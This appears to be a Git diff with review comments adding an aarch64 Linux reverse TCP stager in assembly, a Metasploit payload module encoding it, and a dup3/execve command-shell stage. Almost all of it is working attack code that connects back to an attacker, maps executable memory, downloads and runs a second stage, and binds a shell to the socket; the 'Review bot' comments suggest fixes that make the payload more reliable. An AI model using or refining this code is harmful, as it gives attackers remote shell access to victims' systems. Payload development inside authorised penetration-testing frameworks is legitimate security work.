aarch64 staged shell
parent
8b4ccc66c7
commit
9768a89bcd
|
@ -0,0 +1,96 @@
|
|||
.equ SYS_SOCKET, 0xc6
|
||||
.equ SYS_CONNECT, 0xcb
|
||||
.equ SYS_READ, 0x3f
|
||||
.equ SYS_MMAP, 0xde
|
||||
.equ SYS_EXIT, 0x5d
|
||||
|
||||
.equ AF_INET, 0x2
|
||||
.equ SOCK_STREAM, 0x1
|
||||
|
||||
.equ STDIN, 0x0
|
||||
.equ STDOUT, 0x1
|
||||
.equ STDERR, 0x2
|
||||
|
||||
.equ IP, 0x0100007f
|
||||
.equ PORT, 0x5C11
|
||||
|
||||
start:
|
||||
/* sockfd = socket(AF_INET, SOCK_STREAM, 0) */
|
||||
mov x0, AF_INET
|
||||
mov x1, SOCK_STREAM
|
||||
mov x2, 0
|
||||
mov x8, SYS_SOCKET
|
||||
svc 0
|
||||
mov x12, x0
|
||||
|
||||
/* connect(sockfd, (struct sockaddr *)&server, sockaddr_len) */
|
||||
adr x1, sockaddr
|
||||
mov x2, 0x10
|
||||
mov x8, SYS_CONNECT
|
||||
svc 0
|
||||
cbnz w0, failed
|
||||
|
||||
/* read(sockfd, buf='x1', nbytes=4) */
|
||||
mov x0, x12
|
||||
sub sp, sp, #16
|
||||
mov x1, sp
|
||||
mov x2, #4
|
||||
mov x8, SYS_READ
|
||||
svc 0
|
||||
cbz w0, failed
|
||||
|
||||
ldr x2, [sp,#0]
|
||||
|
||||
/* Page-align, assume <4GB */
|
||||
lsr x2, x2, #12
|
||||
add x2, x2, #1
|
||||
lsl x2, x2, #12
|
||||
|
||||
/* mmap(addr=0, length='x2', prot=7, flags=34, fd=0, offset=0) */
|
||||
mov x0, xzr
|
||||
mov x1, x2
|
||||
mov x2, #7
|
||||
mov x3, #34
|
||||
mov x4, xzr
|
||||
mov x5, xzr
|
||||
/* call mmap() */
|
||||
mov x8, SYS_MMAP
|
||||
svc 0
|
||||
|
||||
/* Grab the saved size, save the address */
|
||||
ldr x4, [sp]
|
||||
|
||||
/* Save the memory address */
|
||||
str x0, [sp]
|
||||
|
||||
/* Read in all of the data */
|
||||
mov x3, x0
|
||||
|
||||
read_loop:
|
||||
/* read(sockfd, buf='x3', nbytes='x4') */
|
||||
mov x0, x12
|
||||
mov x1, x3
|
||||
mov x2, x4
|
||||
/* call read() */
|
||||
mov x8, SYS_READ
|
||||
svc 0
|
||||
add x3, x3, x0
|
||||
subs x4, x4, x0
|
||||
bne read_loop
|
||||
|
||||
/* Go to shellcode */
|
||||
ldr x30, [sp]
|
||||
ret
|
||||
|
||||
failed:
|
||||
mov x0, 0
|
||||
mov x8, SYS_EXIT
|
||||
svc 0
|
||||
|
||||
.balign 4
|
||||
sockaddr:
|
||||
.short AF_INET
|
||||
.short PORT
|
||||
.word IP
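Review bot: The stage length is read as only 4 bytes (`mov x2, #4` at L112) but then consumed with 64-bit loads, `ldr x2, [sp,#0]` at L126 and `ldr x4, [sp]` at L180, so the upper half of the mmap length and of the read count is whatever happened to sit below the old stack pointer; use the zero-extending forms `ldr w2, [sp]` and `ldr w4, [sp]` (or `str xzr, [sp]` before the read). The `read_loop` exit depends solely on `subs x4, x4, x0` / `bne`, so a 0 return (peer closed) spins forever and a negative errno return makes x4 grow; add `cmp x0, #0` / `b.le failed` right after that `svc`. The `mmap` result is stored and used unchecked at L188/L196, and the first read's `cbz w0, failed` lets a -1 return or a short read (<4 bytes) fall through into the length computation. The comment `Page-align, assume <4GB` could note that the lsr/add/lsl rounding always adds one extra page, even for sizes already page-aligned, which is harmless but not obvious.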
|
||||
|
||||
|
|
@ -0,0 +1,105 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
|
||||
|
||||
###
|
||||
#
|
||||
# ReverseTcp
|
||||
# ----------
|
||||
#
|
||||
# Linux reverse TCP stager.
|
||||
#
|
||||
###
|
||||
module MetasploitModule
|
||||
|
||||
CachedSize = 260
|
||||
|
||||
include Msf::Payload::Stager
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Reverse TCP Stager',
|
||||
'Description' => 'Connect back to the attacker',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_AARCH64,
|
||||
'Handler' => Msf::Handler::ReverseTcp,
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 186, 'n' ],
|
||||
'LHOST' => [ 188, 'ADDR' ],
|
||||
},
|
||||
'Payload' =>
|
||||
[
|
||||
0xd2800040, # mov x0, #0x2 // #2
|
||||
0xd2800021, # mov x1, #0x1 // #1
|
||||
0xd2800002, # mov x2, #0x0 // #0
|
||||
0xd28018c8, # mov x8, #0xc6 // #198
|
||||
0xd4000001, # svc #0x0
|
||||
0xaa0003ec, # mov x12, x0
|
||||
0x10000501, # adr x1, b8 <sockaddr>
|
||||
0xd2800202, # mov x2, #0x10 // #16
|
||||
0xd2801968, # mov x8, #0xcb // #203
|
||||
0xd4000001, # svc #0x0
|
||||
0x35000420, # cbnz w0, ac <failed>
|
||||
0xaa0c03e0, # mov x0, x12
|
||||
0xd10043ff, # sub sp, sp, #0x10
|
||||
0x910003e1, # mov x1, sp
|
||||
0xd2800082, # mov x2, #0x4 // #4
|
||||
0xd28007e8, # mov x8, #0x3f // #63
|
||||
0xd4000001, # svc #0x0
|
||||
0x34000340, # cbz w0, ac <failed>
|
||||
0xf94003e2, # ldr x2, [sp]
|
||||
0xd34cfc42, # lsr x2, x2, #12
|
||||
0x91000442, # add x2, x2, #0x1
|
||||
0xd374cc42, # lsl x2, x2, #12
|
||||
0xaa1f03e0, # mov x0, xzr
|
||||
0xaa0203e1, # mov x1, x2
|
||||
0xd28000e2, # mov x2, #0x7 // #7
|
||||
0xd2800443, # mov x3, #0x22 // #34
|
||||
0xaa1f03e4, # mov x4, xzr
|
||||
0xaa1f03e5, # mov x5, xzr
|
||||
0xd2801bc8, # mov x8, #0xde // #222
|
||||
0xd4000001, # svc #0x0
|
||||
0xf94003e4, # ldr x4, [sp]
|
||||
0xf90003e0, # str x0, [sp]
|
||||
0xaa0003e3, # mov x3, x0
|
||||
0xaa0c03e0, # mov x0, x12
|
||||
0xaa0303e1, # mov x1, x3
|
||||
0xaa0403e2, # mov x2, x4
|
||||
0xd28007e8, # mov x8, #0x3f // #63
|
||||
0xd4000001, # svc #0x0
|
||||
0x8b000063, # add x3, x3, x0
|
||||
0xeb000084, # subs x4, x4, x0
|
||||
0x54ffff21, # b.ne 84 <read_loop>
|
||||
0xf94003fe, # ldr x30, [sp]
|
||||
0xd65f03c0, # ret
|
||||
0xd2800000, # mov x0, #0x0 // #0
|
||||
0xd2800ba8, # mov x8, #0x5d // #93
|
||||
0xd4000001, # svc #0x0
|
||||
0x5c110002, # .word 0x5c110002
|
||||
0x0100007f, # .word 0x0100007f
|
||||
].pack("V*")
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
print_status("Transmitting stage length value...(#{payload.length} bytes)")
|
||||
|
||||
address_format = 'V'
|
||||
|
||||
# Transmit our intermediate stager
|
||||
conn.put( [ payload.length ].pack(address_format) )
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
end
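Review bot: `handle_intermediate_stage` sends the stage length as a 32-bit little-endian value (`'V'`), while the encoded stager loads that field with the 64-bit `ldr x2, [sp]` (L450) and `ldr x4, [sp]` (L486) after a 4-byte read, so the Ruby side and the hex disagree on the width of this value and the upper half comes from uninitialized stack; the 32-bit loads would be `0xb94003e2, # ldr w2, [sp]` and `0xb94003e4, # ldr w4, [sp]`, leaving the `LPORT`/`LHOST` offsets unchanged. The comment `# Transmit our intermediate stager` and the status text describe what is actually a length word; `# Send the 4-byte stage length that the stager's first read() expects` matches the code. The 48 encoded words total 192 bytes, which is also what the offsets 186/188 assume, so `CachedSize = 260` looks inconsistent unless it accounts for bytes generated outside this listing — worth confirming against the generator. The parent `handle_intermediate_stage` being overridden is not visible here, so whether the stage itself is sent by the caller afterwards is inferred, not shown.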
|
|
@ -0,0 +1,68 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module MetasploitModule
|
||||
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Linux dup2 Command Shell',
|
||||
'Description' => 'dup2 socket in x12, then execve',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_AARCH64,
|
||||
'Session' => Msf::Sessions::CommandShell,
|
||||
'Stage' =>
|
||||
{
|
||||
'Payload' =>
|
||||
[
|
||||
0xaa0c03e0, # mov x0, x12
|
||||
0xd2800002, # mov x2, #0x0 // #0
|
||||
0xd2800001, # mov x1, #0x0 // #0
|
||||
0xd2800308, # mov x8, #0x18 // #24
|
||||
0xd4000001, # svc #0x0
|
||||
0xd2800021, # mov x1, #0x1 // #1
|
||||
0xd2800308, # mov x8, #0x18 // #24
|
||||
0xd4000001, # svc #0x0
|
||||
0xd2800041, # mov x1, #0x2 // #2
|
||||
0xd2800308, # mov x8, #0x18 // #24
|
||||
0xd4000001, # svc #0x0
|
||||
0x10000140, # adr x0, 54 <shell>
|
||||
0xd2800002, # mov x2, #0x0 // #0
|
||||
0xf90003e0, # str x0, [sp]
|
||||
0xf90007e2, # str x2, [sp,#8]
|
||||
0x910003e1, # mov x1, sp
|
||||
0xd2801ba8, # mov x8, #0xdd // #221
|
||||
0xd4000001, # svc #0x0
|
||||
0xd2800000, # mov x0, #0x0 // #0
|
||||
0xd2800ba8, # mov x8, #0x5d // #93
|
||||
0xd4000001, # svc #0x0
|
||||
0x00000000, # .word 0x00000000 // shell
|
||||
0x00000000, # .word 0x00000000
|
||||
0x00000000, # .word 0x00000000
|
||||
0x00000000, # .word 0x00000000
|
||||
].pack("V*")
|
||||
}
|
||||
))
|
||||
register_options([
|
||||
OptString.new('SHELL', [ true, "The shell to execute.", "/bin/sh" ]),
|
||||
])
|
||||
end
|
||||
|
||||
def generate_stage(opts = {})
|
||||
p = super
|
||||
sh = datastore['SHELL']
|
||||
if sh.length >= 16
|
||||
raise ArgumentError, "The specified shell must be less than 16 bytes."
|
||||
end
|
||||
p[84, sh.length] = sh
|
||||
p
|
||||
end
|
||||
|
||||
end
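Review bot: `generate_stage` bounds the `SHELL` option with `sh.length`, which counts characters, but the region patched at offset 84 is the 16 zero bytes at L720–L729 and execve needs a NUL terminator inside it, so a non-ASCII path of fewer than 16 characters but 16 or more bytes passes the check and is copied without a terminator; use `if sh.bytesize >= 16` and `p[84, sh.bytesize] = sh`. The description `dup2 socket in x12, then execve` names dup2, but syscall 0x18 on aarch64 is dup3 (three calls at L666–L687 with x2 = 0 as the flags argument), so `dup3(sockfd, 0..2, 0) the socket in x12, then execve(SHELL, [SHELL, NULL], NULL)` would be accurate. None of the dup3 returns is checked, which is a reasonable trade-off for a stage this small, but a one-line comment saying so would help the next reader.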
|